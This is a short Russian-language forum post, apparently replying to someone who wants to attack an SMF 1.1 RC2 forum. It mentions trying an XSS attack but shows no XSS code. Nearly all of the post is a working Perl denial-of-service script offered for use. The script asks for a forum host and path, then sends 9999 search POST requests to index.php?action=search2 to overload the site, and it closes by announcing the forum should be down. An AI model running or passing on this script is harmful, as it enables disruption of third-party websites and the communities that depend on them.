Я не знаю сработает ли эта уязвимость на Smf 1.1 Rc2 но попробуй выполнить XSS нападение с этим кодом :
Вот тебе Dos exploit выполненый на перле. Code: #!/usr/bin/perl use IO::Socket; print q{ ################################################## ########## # CMD# ################################################## ########## }; $rand=rand(10); print "Forum Host: "; $serv = <stdin>; chop ($serv); print "Forum Path: "; $path = <stdin>; chop ($path); for ($i=0; $i<9999; $i++) { $postit = "search=Albanian+Hackers+Group+Proof+of+Concept+$x+ &search_terms=any&search_author=&search_forum=-1&search_time=0&search_fields=msgonly&search_cat=-1&sort_by=0&sort_dir=ASC&show_results=posts&return_chars=200"; $lrg = length $postit; my $sock = new IO::Socket::INET ( PeerAddr => "$serv", PeerPort => "80", Proto => "tcp", ); die "\nThe Socket Can't Connect To The Desired Host or the Host is MayBe DoSed: $!\n" unless $sock; print $sock "POST $path"."index.php?action=search2 HTTP/1.1\n"; print $sock "Host: $serv\n"; print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n"; print $sock "Referer: $serv\n"; print $sock "Accept-Language: en-us\n"; print $sock "Content-Type: application/x-www-form-urlencoded\n"; print $sock "Accept-Encoding: gzip, deflate\n"; print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n"; print $sock "Connection: Keep-Alive\n"; print $sock "Cache-Control: no-cache\n"; print $sock "Content-Length: $lrg\n\n"; print $sock "$postit\n"; close($sock); ## Print a "+" for every loop syswrite STDOUT, "+"; } print "Forum shuld be Dosed. Check it out...\n";